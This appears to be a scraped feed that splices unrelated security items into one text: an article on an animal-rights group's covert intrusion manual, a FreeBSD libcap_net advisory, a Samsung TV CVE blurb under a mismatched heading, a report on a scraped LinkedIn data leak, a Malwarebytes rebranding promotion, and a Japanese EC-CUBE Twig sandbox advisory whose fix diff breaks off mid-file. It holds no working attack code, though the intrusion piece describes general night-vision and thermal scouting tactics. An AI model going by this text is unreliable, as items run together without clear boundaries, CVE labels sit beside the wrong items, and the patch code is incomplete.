For the first time, guerrilla animal rights group Direct Action Everywhere reveals a guide to its investigative tactics and toolkit, from spy cams to night vision and drones.

In recent years, the animal liberation group Direct Action Everywhere has carried out some of the most brazen and tech-savvy operations and investigations to ever target the animal agriculture industry. It has rescued pigs, goats, ducks, and chickens from factory farms and slaughterhouses in midnight intrusions; captured virtual reality footage with custom-built 360-degree video rigs inside massive pig barns; and used hidden cameras to record some of the meat industry's most disturbing practices, from the carbon dioxide gas chambers that are increasingly used in pig slaughterhouses to the “ventilation shutdowns” designed to cull thousands of farm animals through overheating and suffocation.

To pull off all those revelatory and often highly controversial actions, Direct Action Everywhere (which uses the abbreviation DxE) has also spent years evolving its toolkit and operational rigor—from communications security and physical stealth, to penetration tactics for getting inside factory farms and slaughterhouses. It has also long maintained a manual of its own methods for those operations. Now, for the first time, it's publicly releasing that guide.

The document is a rare glimpse into the detailed tech and tactics of a group that carries out sophisticated and often illegal acts of intrusion and espionage, turning a playbook that might otherwise be used by spies or thieves into one for grassroots activism. “To spend so much time thinking about the vulnerabilities in these facilities, how to get in, avenues of approach,” says Lewis Bernier, a longtime investigator at DxE who has led or participated in hundreds of operations inside farms and slaughterhouses around the country, “I think it's really changed the way I see security as a whole.”

A note of warning: Despite the “how-to” tone of the guide itself, do not try this at home. DxE investigators frequently face criminal charges, and DxE's critics in the agriculture industry and in law enforcement describe the group as radicals with extreme tactics. Despite the group’s nonviolent approach, the agribusiness trade group WATT Global Media wrote in 2018 that DxE “could very well be the most dangerous animal rights organization out there.” Even some other animal rights organizations have balked at their risky methods, especially given the potential for prison sentences under some US states’ severe laws protecting animal agriculture businesses.

DxE goes as far as to welcome those criminal charges, often willingly identifying themselves after an investigation's findings are released in an effort to draw more attention to their revelations and argue the justice of their cause. In fact, the group's cofounder, Wayne Hsiung, was convicted just last week on a felony charge of conspiracy to commit trespassing related to the removal of ducks and chickens from a California poultry farm. He now potentially faces years in prison.

Bernier says that DxE decided to publicly release its guide, even in the wake of Hsiung’s conviction, to help activists who are already committed to carrying out covert investigations do their work more safely and effectively. “More and more people around the world want to do this stuff, or at least are just interested in how it works,” he says. “I think this guide will offer an opportunity for people to understand what's really involved.”

Drones, Night Vision, and Spy Cams

Much of the guide is focused less on spy tricks and espionage gear than on effective activism: team building, creating a chain of command, understanding the media, logistics, planning, biosecurity to avoid contaminating farms with disease, and creating a “security culture” that avoids the gossip, bragging, prying, and infighting that can lead to operations being blown or infiltrated by law enforcement.

But other elements of the manual offer specific descriptions of surveillance tools like drones, hidden cameras, and thermal and night vision scopes. For stealthy after-hours intrusions into factory farms and other facilities, for instance, the guide describes assigning a team member as a scout, equipped with night vision and thermal imaging tools. The guide specifically names the Sionyx Aurora Sport as its recommended night vision camera for both reconnaissance and capturing images in the dark, but notes that thermal imaging tools like the Flir Scout TK offer its scouts other advantages. Thermal imaging can reveal which parts of a facility are active, the guide notes, given that those buildings will be running heating or fans, and also show from a distance which vehicles outside a building have their engines running or have recently moved, revealed in heat traces on a car or truck's brakes.

This Is the Ops Manual for the Most Tech-Savvy Animal Liberation Group in the US

In versions of FreeBSD 13-RELEASE before 13-RELEASE-p5, under certain circumstances the cap_net libcasper(3) service incorrectly validates that updated constraints are strictly subsets of the active constraints.  When only a list of resolvable domain names was specified without setting any other limitations, an application could submit a new list of domains including include entries not previously listed.  This could permit the application to resolve domain names that were previously restricted.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= FreeBSD-SA-23:16.cap\_net Security Advisory The FreeBSD Project Topic: Incorrect libcap\_net limitation list manipulation Category: core Module: libcap\_net Announced: 2023-11-08 Credits: Shawn Webb, Mariusz Zaborski Affects: FreeBSD 13.2 and later Corrected: 2023-11-06 19:19:04 UTC (stable/14, 14.0-STABLE) 2023-11-08 00:45:34 UTC (releng/14.0, 14.0-RC4-p1) 2023-11-06 19:19:54 UTC (stable/13, 13.2-STABLE) 2023-11-08 00:49:31 UTC (releng/13.2, 13.2-RELEASE-p5) CVE Name: CVE-2023-5978 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit . I. Background libcasper(3) allows Capsicum-sandboxed applications to define and use system interfaces which would otherwise be disallowed, through implementing special services. One of these services, libcap\_net, enables networking capabilities within the restriced environment. II. Problem Description Casper services allow limiting operations that a process can perform. Each service maintains a specific list of permitted operations. Certain operations can be further restricted, such as specifying which domain names can be resolved. During the verification of limits, the service must ensure that the new set of constraints is a subset of the previous one. In the case of the cap\_net service, the currently limited set of domain names was fetched incorrectly. III. Impact In certain scenarios, if only a list of resolvable domain names was specified without setting any other limitations, the application could submit a new list of domains including include entries not previously in the list. IV. Workaround No workaround is available. Note that no FreeBSD base system software is vulnerable to this issue. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the amd64, i386, or (on FreeBSD 13 and later) arm64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Rebooting for a security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-23:16/cap\_net.patch # fetch https://security.FreeBSD.org/patches/SA-23:16/cap\_net.patch.asc # gpg --verify cap\_net.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in . Restart all daemons that use the library, or reboot the system. VI. Correction details This issue is corrected by the corresponding Git commit hash or Subversion revision number in the following stable and release branches: Branch/path Hash Revision - ------------------------------------------------------------------------- stable/14/ 765757c6301f stable/14-n265696 releng/14.0/ 5f4fc91cc87c releng/14.0-n265377 stable/13/ 114c6d9bef76 stable/13-n256672 releng/13.2/ acd860c3622d releng/13.2-n254640 - ------------------------------------------------------------------------- Run the following command to see which files were modified by a particular commit: # git show --stat Or visit the following URL, replacing NNNNNN with the hash: To determine the commit count in a working tree (for comparison against nNNNNNN in the table above), run: # git rev-list --count --first-parent HEAD VII. References The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEthUnfoEIffdcgYM7bljekB8AGu8FAmVLKaYACgkQbljekB8A Gu8Ofg/6AxzPey7hIS6rRO5Mv5ufiKEiYDwPo3t6epUiaLid21KhkLry1CofqFHd pC0zsYDJiWCkvieGBHhCkNYmffL9TCgLqNxSSH7plwMHwrLLQKxYRVn9V0ReGdc9 qRY5XB1W0Ocns0CbpEXuMRNde5UNwc63xN0/xlnBESfex6+fP9kPNB7VLoYY4Foj jDzn6s8YNaUOVO7YtlZDjPRRazwVLriQ3Bf+lCNkJFq4VyyhRPFkeknOFHt5olA2 dp+DIVQGUVRGjeaZDlxLZ4j0Nw39ZK8T6mSXSskjtSfQtHd6DPgDFBzZKjhtzRFd +5lutnrXpZemQjUcOKqVG1ZmlbDQChIWVlJ1kyORRjb8ZO+vknhFo/w3a5o4sq1A ZtK1w2CFo0+jL+oWxJdFEiRFR0jwMtVfMCzZAoLsDXnYbmni/353BKGMlBFgdsAy Php3E/LsxCoFaZ+r87Z6O2UefEYMCr1FDM99SQkU1Ui3kzWEskHEvPR6JS31Htu2 9ry3c4T08r1Qhp7J9Zdfnwvtd0fyEWn16ewzeiV4M6+gPErWZncar+86b87IRKof bTJ4XiK7kcORyD5ksgcBINUd5njOvXGIYTfkqSmlyikAhnoM7MN3npUGyRq6KQTE NPAr3gWrch7pegBVP3JuDQaYwfJarg6BmPb9sWWfkzQHRf9pfOI= =XNt1 -----END PGP SIGNATURE-----

CVE-2023-5978

Improper Restriction of Excessive Authentication Attempts vulnerability in Samsung Smart TV UE40D7000 version T-GAPDEUC-1033.2 and before allows attackers to cause a denial of service via WPS attack tools.

CVE-2023-41270: SMOLD TV: Old & Smart

By Waqas
The hacker responsible for this leak is the same individual who previously leaked databases from InfraGard and Twitter.
This is a post from HackRead.com Read the original post: Hacker Leaks 35 Million Scraped LinkedIn User Records

The scraped LinkedIn database was leaked in two parts: one part contained 5 million user records, while the second part contained 35 million records.

A LinkedIn database, holding the personal information of over 35 million users, was leaked by a hacker operating under the alias USDoD. The database was leaked on the infamous cybercrime and hacker platform, **Breach Forums**.

It is important to note that USDoD is the same hacker responsible for breaching the FBI’s security platform InfraGard last year and disclosing the personal details of 87,000 of its members.

The hacker confirmed in a post on Breach Forums that the most recent LinkedIn database was obtained through **web scraping**. Web scraping is an automated process utilized by software to extract data from websites, primarily for gathering specific information from web pages.

The data was leaked in two parts (Screenshot: Hackread.com)

Regarding the contents of the data, as observed by _Hackread.com_, the database predominantly comprises publicly available information from **LinkedIn** profiles, containing full names and profile bios. Although the database contains millions of email addresses, it’s a relief to note that no passwords are included in the leaked data.

The screenshot below shows email addresses included in the breach belong to high-ranking US government officials and institutions. Additionally, email addresses from various government agencies worldwide have also been identified.

(Screenshot: Hackread.com)

****Legitimacy of LinkedIn Data: Authentic or Fraudulent?****

Troy Hunt of HaveIBeenPwned **analysed** over 5 million accounts from the database and concluded that it includes a mixture of information from various sources such as public LinkedIn profiles, fabricated email addresses, and other sources. Troy emphasizes that while some of the data might be anecdotal or partially fabricated, the people, companies, domains, and many email addresses are real.

_“_Because the conclusion is that there’s a significant component of legitimate data in this corpus, I’ve loaded it into HIBP,_“_ Hunt explained. _“_But because there are also a significant number of fabricated email addresses in there, I’ve flagged it as a spam list which means the addresses won’t impact the scale of anyone’s paid subscription if they’re monitoring domains._“_

The LinkedIn database has been identified and labelled as “scraped and fabricated data” on HIBP

This however is not the first time when LinkedIn’s scrapped database has been leaked online. In April 2021, a threat actor was selling 2 scraped LinkedIn databases with 500 million and 827 million records. In June 2021, a hacker sold a scrapped LinkedIn database containing data of 700 million users.

****_RELATED ARTICLES_****

1.  **Hackers Posed as Israelis in Targeted LinkedIn Phishing Attack**
2.  **Twitter Scraping Breach: 209M Accounts Leaked on Hacker Forum**
3.  **API Misuse: Hacker Exposes 2.6M Duolingo Users’ Emails & Names**
4.  **Meta Fined €265 million in Facebook Data Scraping Case in the EU**
5.  **Data scraping firm leaks 235m Instagram, TikTok, YouTube user data**

Hacker Leaks 35 Million Scraped LinkedIn User Records

With the release of ThreatDown, let's take a look at Malwarebytes' 15-year legacy and what's next.

November marks a significant shift in our legacy. After 15 years as Malwarebytes, we are proud to introduce our rebranded identity, ThreatDown powered by Malwarebytes.

Building off Malwarebytes’ initial recognition for removing every trace of viruses that others missed, ThreatDown powered by Malwarebytes combines award-winning technologies that cover all stages of an attack, with managed services for teams with limited resources.

To say it’s been quite a journey to this point would be an understatement. From our beginnings as a remediation consumer tool to becoming a titan in business cyber protection, let’s walk through where we’ve come and where we’re headed.

**Anti-Malware Small Business Edition (2008 – 2012)**

Malwarebytes for Business began its journey in the late 2000s, offering corporate licensing for its consumer anti-malware product. By 2012, our focus intensified as we launched the Anti-Malware Small Business Edition, introducing advanced features to meet the specific demands of businesses.

**Malwarebytes Enterprise Edition (September 2012 – 2016)**

The introduction of Malwarebytes Enterprise Edition (MEE) in late 2012 solidified our position in the enterprise market. Tailored for businesses, governments, and educational institutions, MEE provided comprehensive threat protection and malware remediation. As the demand for our expertise grew, esteemed institutions such as The University of Alabama and NextGen Healthcare became part of our clientele.

**Malwarebytes Endpoint Security (June 2014 – 2016)**

2014 saw the birth of the Anti-Malware Remediation Tool, a streamlined malware solution for businesses. Shortly after, Malwarebytes Endpoint Security was launched, merging multiple essential tools into one comprehensive package.

**Nebula (2017 – 2018)**

Transitioning into cloud security management, 2017 introduced Nebula 1.0, our cloud-based console. This platform brought together our machine learning-backed Malwarebytes Incident Response and Endpoint Protection products.

**OneView (2019)**

2019 heralded the debut of OneView, a multi-tenant console tailored for Managed Service Providers (MSPs). With OneView, MSPs could efficiently manage multiple clients’ security needs from a unified platform.

**Comprehensive Endpoint Detection and Response Offerings (2020 – 2021)**

Throughout 2020 and 2021, we fortified our EDR capabilities, including extensions to support Windows servers. With features such as Flight Recorder Search, Threat Hunting Alerts, and Brute Force Protection, we further strengthened our protective measures against cyber threats.

**Managed Detection and Response (2022)**

Last year, we delved into a multitude of new services and tools, including Device Control, Vulnerability Assessment, Patch Management Modules, and many more. Our crowning achievement was the introduction of Malwarebytes Managed Detection and Response (MDR) service, providing 24×7 monitoring and investigations for resource constrained IT teams.

**Securing The Against the Next Generation of Threats (2023 and beyond)**

2023 marked our foray into Mobile Protection for iOS, Android, and Chromebook platforms, helping organizations crush mobile threats on iOS, Android, and ChromeOS. The introduction of an Application Blocking Module gave administrators even greater control over app installations on devices.

Further, with the release of Malwarebytes Security Advisor, we transformed the Nebula customer experience to enable organizations to visualize and improve their security posture in just a few minutes. We also released Malwarebytes Managed Threat Hunting (MTH), a 24/7 service that proactively identifies and then alerts EDR customers to potential threats before an active attack begins.

**Into The Future With ThreatDown powered by Malwarebytes**

Originating from Malwarebytes’ 15-year legacy in combating daily malware threats, ThreatDown powered by Malwarebytes has evolved in tandem with the ever-changing threat landscape.

ThreatDown’s mission for businesses is straightforward: neutralize threats promptly and efficiently, without the need for extensive IT teams, prolonged setup times, or substantial budgets. We combine the technologies and services that resource constrained IT teams need into four streamlined, cost-effective bundles that take down threats, take down complexity and take down costs:

*   **ThreatDown Core Bundle**: Basic malware protection and threat surface reduction. A simple yet superior solution integrating award-winning endpoint protection technologies.
*   **ThreatDown Advanced Bundle**: Everything included in core plus Automated Threat Hunting and Ransomware Rollback. Tailored for smaller security teams with limited resources.
*   **ThreatDown Elite Bundle**: Everything in Advanced plus 24/7 expert monitoring and response by Malwarebytes MDR analysts. Purpose-built for organizations with small (to non-existent) security teams that lack the resources to address all security alerts.
*   **ThreatDown Ultimate Bundle**: Everything in Elite plus protection from categories of malicious websites. Perfect for teams looking for a SOC-in-a-box, a one-and-done shortcut to cybersecurity done right.

In short, with ThreatDown, the mission is clear: To take down threats to businesses and reduce attack surfaces immediately, without the need for an IT army or big budgets. Together, we can overpower threats—and empower IT.

Visit www.threatdown.com to learn more.

 ThreatDown powered by Malwarebytes: A 15 Year Journey 

EC-CUBE 3 series (3.0.0 to 3.0.18-p6) and 4 series (4.0.0 to 4.0.6-p3, 4.1.0 to 4.1.2-p2, and 4.2.0 to 4.2.2) contain an arbitrary code execution vulnerability due to improper settings of the template engine Twig included in the product. As a result, arbitrary code may be executed on the server where the product is running by a user with an administrative privilege.

**更新履歴**

2023/11/09 15:00

目次の追加

2023/11/07 14:00

JVNからの公表内容情報へのリンクを追加

2023/10/26 13:00

初版公開

**目次**

*   EC-CUBEにおけるRCE可能な脆弱性
*   脆弱性の概要
*   Twigの更新手順
*   修正方法1: 修正ファイルを利用する場合(4.0系)
*   修正方法2: 修正差分を確認して適宜反映する場合(4.0系)
*   問い合わせ先
*   謝辞

**EC-CUBEにおけるRCE可能な脆弱性**

EC-CUBE 4.0系におけるRCE可能な脆弱性(危険度: 低)があることが判明いたしました。

脆弱性そのものは、修正の反映によりすぐに解決するものです。  
以下のいずれかの方法により、ご対応をお願いいたします。

*   修正ファイルを適用する
*   修正差分を確認して適用する

皆様にはお手数おかけし誠に申し訳ございません。  
本脆弱性における被害報告は現時点でございませんが、できるだけ速やかにご対応をお願いいたします。

**脆弱性の概要****EC-CUBEにおけるRCE可能な脆弱性****危険度:**

低

**不具合が存在するEC-CUBEのバージョン:**

*   **4.0.0〜4.0.6-p3**

**詳細:**

該当バージョンのEC-CUBEにはRCE可能な脆弱性が存在します。EC-CUBEはテンプレートエンジンとしてTwigを利用していますが、EC-CUBEの一部画面でTwigに対する設定不備が存在し、攻撃者が対象のシステム上で任意のコードを実行できる可能性があります。

**JVNからの公表内容 (2023/11/07公開)**

JVN#29195731: EC-CUBE 3系および 4系において任意のコードを実行される脆弱性

*   EC-CUBE 3系および 4系において任意のコードを実行される脆弱性 CVE-2023-46845

**Twigの更新手順**

EC-CUBE4.0系で利用している場合、Twigの不具合によりSandBox機能が動作しません。  
修正方法を実施する前に、Twigのアップデートを行ってください。

Twigをアップデートするためには、composerを使用する方法とファイルを手動でアップデートする方法の2つがあります。  
以下のどちらかを実施してください。

*   **composerコマンドにて、Twigをアップデート:**
    
    以下のコマンドを実行し、Twigを新しいバージョンに更新してください。  
    $ composer update twig/twig  
    $ composer update twig/extensions
    
    また、以下のコマンドを実行し、Twigが更新されていることを確認してください。
    
    $ composer show twig/twig  
    ※以下のように表示されることを確認してください。  
    name : twig/twig  
    versions : \* v2.15.5
    
    $ composer show twig/extensions  
    ※以下のように表示されることを確認してください。  
    name : twig/extensions  
    versions : \* v1.5.4
    

*   **Twigのファイルを手動でアップデート:**
    
    Twigを手動でアップデートする時は、以下の手順に従ってください。
    
    twig/twigのファイルを以下のURLからダウンロードします。  
    https://github.com/twigphp/Twig/archive/refs/tags/v2.15.5.zip
    
    \[EC-CUBEの設置先\]/vendor/twig/twigディレクトリ内を削除してください。  
    ダウンロードしたZIPファイルを\[EC-CUBEの設置先\]/vendor/twig/twigディレクトリに展開してください。
    
    twig/extensionのファイルを以下のURLからダウンロードします。  
    https://github.com/twigphp/Twig-extensions/archive/refs/tags/v1.5.4.zip
    
    \[EC-CUBEの設置先\]/vendor/twig/extensionsディレクトリ内を削除してください。  
    ダウンロードしたZIPファイルを\[EC-CUBEの設置先\]/vendor/twig/extensionsディレクトリに展開してください。
    
    ファイルが正しく上書きされたことを確認してください。  
    また、EC-CUBEの動作を確認し、テンプレートが正しく表示されることを確認してください。
    

**修正方法1: 修正ファイルを利用する場合**(4.0系)****

**※本修正を実施する前に、Twigの更新を必ず行ってください。**

開発環境がある場合は、まず開発環境でお試しください。  
以下の手順に従って、修正ファイルの反映をお願いいたします。

1.  修正ファイルのダウンロード
    
    ご利用中のEC-CUBEのバージョンに該当する修正ファイルをダウンロードしてください。  
    ※EC-CUBEのバージョンはこちらの手順でご確認ください。  
    ※修正ファイルは各バージョンの最新版に対して作成しています。旧バージョンをご利用の場合は、「修正方法2」のご対応をお願いします。  
    ※対象のファイルに対して既にカスタマイズをしている場合は、「修正方法2」のご対応をお願いします。
    
    *   **修正ファイル(4.0.6-p3)** (SHA256:0bcbb847ea1aaf8443f49f30015066122ce27f253574dcc92cae4b5859a6646f)
    
    ダウンロードし、解凍していただきますと、以下の修正ファイルがあります。必ず該当するバージョンのファイルをご利用ください。
    
    **4.0.6-p3**
    *   app/config/eccube/packages/twig\_extensions.yaml
    *   src/Eccube/Resource/template/default/Product/detail.twig
    *   src/Eccube/Resource/template/default/default\_frame.twig
    *   src/Eccube/Twig/Extension/IgnoreTwigSandboxErrorExtension.php
    *   src/Eccube/Twig/Sandbox/SecurityPolicyDecorator.php
2.  EC-CUBEファイルのバックアップ
    
    あらかじめEC-CUBEファイル全体のバックアップを行ってください。  
    
3.  修正ファイルの反映
    
    以下のファイルを上書き更新してください。
    
    上書きするファイル
    
    **4.0.6-p3**
    
    *   app/config/eccube/packages/twig\_extensions.yaml
    *   src/Eccube/Resource/template/default/Product/detail.twig
    *   src/Eccube/Resource/template/default/default\_frame.twig
    *   src/Eccube/Twig/Extension/IgnoreTwigSandboxErrorExtension.php
    *   src/Eccube/Twig/Sandbox/SecurityPolicyDecorator.php
    
    下記にファイルが存在する場合は同様に上書きをお願いします
    
    *   app/template/default/Product/detail.twig
    *   app/template/default/default\_frame.twig
    
    また、snippet.twigに関してはプラグインで拡張する箇所となるため対応不要となります。
    
    ※デザインテンプレートの適用や、EC-CUBE本体のカスタマイズをしている場合、修正箇所の差分をご確認のうえ反映をお願いします。  
    ※開発環境がある場合は、開発環境での反映・動作確認を行った後に、本番環境への反映をおすすめします。
4.  キャッシュの削除
    
    EC-CUBE のキャッシュの削除が必要です。  
    EC-CUBE の管理画面にログインいただき、コンテンツ管理 -> キャッシュ管理 のページからキャッシュの削除をお願いいたします。
    
5.  動作確認
    
    フロント画面と管理画面（ログインが必要）それぞれにおいて、基本操作が正常に行えることをご確認ください。  
    

**修正方法2: 修正差分を確認して適宜反映する場合**(4.0系)****

**※本修正を実施する前に、Twigの更新を必ず行ってください。**

以下のコード差分情報を参照して頂き、必要な箇所に修正を反映してください。

本修正方法はEC-CUBE 4.0.6-p3のバージョンを例として提示しております。  
過去バージョンをご利用の場合は、下記修正対象ファイルの修正差分を参考にご対応お願いいたします。  

**修正差分**

1.  app/config/eccube/packages/twig\_extensions.yaml +143 \-0
2.  src/Eccube/Resource/template/default/Product/detail.twig +1 \-1
3.  src/Eccube/Resource/template/default/default\_frame.twig +1 \-1
4.  src/Eccube/Twig/Extension/IgnoreTwigSandboxErrorExtension.php +78 \-0
5.  src/Eccube/Twig/Sandbox/SecurityPolicyDecorator.php +47 \-0

@@ -8,3 +8,146 @@ services:

8

8

  #Twig\\Extensions\\DateExtension: ~

9

9

  Twig\\Extensions\\IntlExtension: ~

10

10

  #Twig\\Extensions\\TextExtension: ~

11

+  

12

+ eccube.twig\_sandbox.policy:

13

+ class: Twig\\Sandbox\\SecurityPolicy

14

+ arguments:

15

+ $allowedTags: "%eccube.twig\_sandbox.allowed\_tags%"

16

+ $allowedFilters: "%eccube.twig\_sandbox.allowed\_filters%"

17

+ $allowedFunctions: "%eccube.twig\_sandbox.allowed\_functions%"

18

+ $allowedMethods: "%eccube.twig\_sandbox.allowed\_methods%"

19

+ $allowedProperties: "%eccube.twig\_sandbox.allowed\_properties%"

20

+ eccube.twig\_sandbox.extension:

21

+ class: Twig\\Extension\\SandboxExtension

22

+ arguments:

23

+ \- '@eccube.twig\_sandbox.policy'

24

+ \- false

25

+ tags: \['twig.extension'\]

26

+ Eccube\\Twig\\Sandbox\\SecurityPolicyDecorator:

27

+ decorates: 'eccube.twig\_sandbox.policy'

28

+ parameters:

29

+ eccube.twig\_sandbox.allowed\_tags:

30

+ \- 'apply'

31

+ \- 'block'

32

+ \- 'deprecated'

33

+ \- 'embed'

34

+ \- 'extends'

35

+ \- 'flush'

36

+ \- 'for'

37

+ \- 'if'

38

+ \- 'set'

39

+ \- 'spaceless'

40

+ \- 'verbatim'

41

+ \- 'with'

42

+ \- 'form\_theme'

43

+ \- 'stopwatch'

44

+ \- 'trans'

45

+ \- 'trans\_default\_domain'

46

+ eccube.twig\_sandbox.allowed\_filters:

47

+ \- 'abs'

48

+ \- 'batch'

49

+ \- 'capitalize'

50

+ \- 'column'

51

+ \- 'convert\_encoding'

52

+ \- 'date'

53

+ \- 'date\_modify'

54

+ \- 'default'

55

+ \- 'escape'

56

+ \- 'first'

57

+ \- 'format'

58

+ \- 'join'

59

+ \- 'json\_encode'

60

+ \- 'keys'

61

+ \- 'last'

62

+ \- 'length'

63

+ \- 'lower'

64

+ \- 'merge'

65

+ \- 'nl2br'

66

+ \- 'number\_format'

67

+ \- 'replace'

68

+ \- 'reverse'

69

+ \- 'round'

70

+ \- 'slice'

71

+ \- 'spaceless'

72

+ \- 'split'

73

+ \- 'striptags'

74

+ \- 'title'

75

+ \- 'trim'

76

+ \- 'upper'

77

+ \- 'url\_encode'

78

+ \- 'abbr\_class'

79

+ \- 'abbr\_method'

80

+ \- 'file\_link'

81

+ \- 'format\_args'

82

+ \- 'format\_args\_as\_text'

83

+ \- 'humanize'

84

+ \- 'trans'

85

+ \- 'yaml\_dump'

86

+ \- 'yaml\_encode'

87

+ \- 'date\_day'

88

+ \- 'date\_day\_with\_weekday'

89

+ \- 'date\_format'

90

+ \- 'date\_min'

91

+ \- 'date\_sec'

92

+ \- 'doctrine\_pretty\_query'

93

+ \- 'doctrine\_replace\_query\_parameters'

94

+ \- 'e'

95

+ \- 'ellipsis'

96

+ \- 'file\_ext\_icon'

97

+ \- 'form\_encode\_currency'

98

+ \- 'format\_log\_message'

99

+ \- 'no\_image\_product'

100

+ \- 'price'

101

+ \- 'time\_ago'

102

+ \- 'doctrine\_minify\_query'

103

+ \- 'localizedcurrency'

104

+ \- 'localizeddate'

105

+ \- 'localizednumber'

106

+ \- 'transchoice'

107

+ eccube.twig\_sandbox.allowed\_functions:

108

+ \- 'cycle'

109

+ \- 'date'

110

+ \- 'max'

111

+ \- 'min'

112

+ \- 'random'

113

+ \- 'range'

114

+ \- 'absolute\_url'

115

+ \- 'asset'

116

+ \- 'asset\_version'

117

+ \- 'csrf\_token'

118

+ \- 'is\_granted'

119

+ \- 'logout\_path'

120

+ \- 'logout\_url'

121

+ \- 'path'

122

+ \- 'relative\_path'

123

+ \- 'url'

124

+ \- 'active\_menus'

125

+ \- 'class\_categories\_as\_json'

126

+ \- 'csrf\_token\_for\_anchor'

127

+ \- 'currency\_symbol'

128

+ \- 'get\_all\_carts'

129

+ \- 'get\_cart'

130

+ \- 'get\_carts\_total\_price'

131

+ \- 'get\_carts\_total\_quantity'

132

+ \- 'has\_errors'

133

+ \- 'is\_reduced\_tax\_rate'

134

+ \- 'product'

135

+ \- 'workflow\_can'

136

+ \- 'workflow\_has\_marked\_place'

137

+ \- 'workflow\_marked\_places'

138

+ \- 'workflow\_transitions'

139

+ \- 'device\_version'

140

+ \- 'full\_view\_url'

141

+ \- 'is\_android\_os'

142

+ \- 'is\_device'

143

+ \- 'is\_full\_view'

144

+ \- 'is\_ios'

145

+ \- 'is\_mobile'

146

+ \- 'is\_mobile\_view'

147

+ \- 'is\_not\_mobile\_view'

148

+ \- 'is\_tablet'

149

+ \- 'is\_tablet\_view'

150

+ eccube.twig\_sandbox.allowed\_methods:

151

+ 'Symfony\\Bridge\\Twig\\AppVariable': \[ 'getrequest' \]

152

+ 'Symfony\\Component\\HttpFoundation\\Request': \[ 'geturi' \]

153

+ eccube.twig\_sandbox.allowed\_properties: \[\]

@@ -375,7 +375,7 @@ file that was distributed with this source code.

375

375

  </div>

376

376

  {% if Product.freearea %}

377

377

  <div class="ec-productRole\_\_description">

378

\- {{ include(template\_from\_string(Product.freearea)) }}

378

+ {{ include(template\_from\_string(Product.freearea), sandboxed = true) }}

379

379

  </div>

380

380

  {% endif %}

381

381

  </div>

@@ -28,7 +28,7 @@ file that was distributed with this source code.

28

28

  <meta name="robots" content="{{ Page.meta\_robots }}">

29

29

  {% endif %}

30

30

  {% if Page.meta\_tags is not empty %}

31

\- {{ include(template\_from\_string(Page.meta\_tags)) }}

31

+ {{ include(template\_from\_string(Page.meta\_tags), sandboxed = true) }}

32

32

  {% endif %}

33

33

  <link rel="icon" href="{{ asset('assets/img/common/favicon.ico', 'user\_data') }}">

34

34

  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css" integrity="sha384-HSMxcRTRxnN+Bdg0JdbxYKrThecOKuH5zCYotlSAcp1+c8xmyTe9GYg1l9a69psu" crossorigin="anonymous">

@@ -0,0 +1,78 @@

1

+ <?php

2

+  

3

+ /\*

4

+ \* This file is part of EC-CUBE

5

+ \*

6

+ \* Copyright(c) EC-CUBE CO.,LTD. All Rights Reserved.

7

+ \*

8

+ \* http://www.ec-cube.co.jp/

9

+ \*

10

+ \* For the full copyright and license information, please view the LICENSE

11

+ \* file that was distributed with this source code.

12

+ \*/

13

+  

14

+ namespace Eccube\\Twig\\Extension;

15

+  

16

+ use Twig\\Environment;

17

+ use Twig\\Error\\LoaderError;

18

+ use Twig\\Extension\\AbstractExtension;

19

+ use Twig\\Extension\\SandboxExtension;

20

+ use Twig\\Sandbox\\SecurityError;

21

+ use Twig\\TwigFunction;

22

+  

23

+ /\*\*

24

+ \* \\vendor\\twig\\twig\\src\\Extension\\CoreExtension の拡張

25

+ \*/

26

+ class IgnoreTwigSandboxErrorExtension extends AbstractExtension

27

+ {

28

+ /\*\*

29

+ \* {@inheritdoc}

30

+ \*/

31

+ public function getFunctions(): array

32

+ {

33

+ return \[

34

+ new TwigFunction('include', \[$this, 'twig\_include'\], \['needs\_environment' => true, 'needs\_context' => true, 'is\_safe' => \['all'\]\]),

35

+ \];

36

+ }

37

+  

38

+ /\*\*

39

+ \* twig sandboxの例外を操作します

40

+ \* app\_env = devの場合、エラーを表示する

41

+ \* app\_env = prodの場合、エラーを表示しない

42

+ \*

43

+ \* @param Environment $env

44

+ \* @param $context

45

+ \* @param $template

46

+ \* @param $variables

47

+ \* @param $withContext

48

+ \* @param $ignoreMissing

49

+ \* @param $sandboxed

50

+ \*

51

+ \* @return string|void

52

+ \*

53

+ \* @throws LoaderError

54

+ \* @throws SecurityError

55

+ \*/

56

+ public function twig\_include(Environment $env, $context, $template, $variables = \[\], $withContext = true, $ignoreMissing = false, $sandboxed = false)

57

+ {

58

+ try {

59

+ return \\twig\_include($env, $context, $template, $variables, $withContext, $ignoreMissing, $sandboxed);

60

+ } catch (SecurityError $e) {

61

+  

62

+ // devではエラー画面が表示されるようにする

63

+ $appEnv = env('APP\_ENV');

64

+ if ($appEnv === 'dev') {

65

+ throw $e;

66

+ } else {

67

+ // ログ出力

68

+ log\_warning($e->getMessage(), \['exception' => $e\]);

69

+  

70

+ // 例外がスローされた場合、sandboxが効いた状態になってしまうため追加

71

+ $sandbox = $env->getExtension(SandboxExtension::class);

72

+ if (!$sandbox->isSandboxedGlobally()) {

73

+ $sandbox->disableSandbox();

74

+ }

75

+ }

76

+ }

77

+ }

78

+ }

@@ -0,0 +1,47 @@

1

+ <?php

2

+  

3

+ /\*

4

+ \* This file is part of EC-CUBE

5

+ \*

6

+ \* Copyright(c) EC-CUBE CO.,LTD. All Rights Reserved.

7

+ \*

8

+ \* http://www.ec-cube.co.jp/

9

+ \*

10

+ \* For the full copyright and license information, please view the LICENSE

11

+ \* file that was distributed with this source code.

12

+ \*/

13

+  

14

+ namespace Eccube\\Twig\\Sandbox;

15

+  

16

+ use Twig\\Sandbox\\SecurityPolicy as BasePolicy;

17

+ use Twig\\Sandbox\\SecurityPolicyInterface;

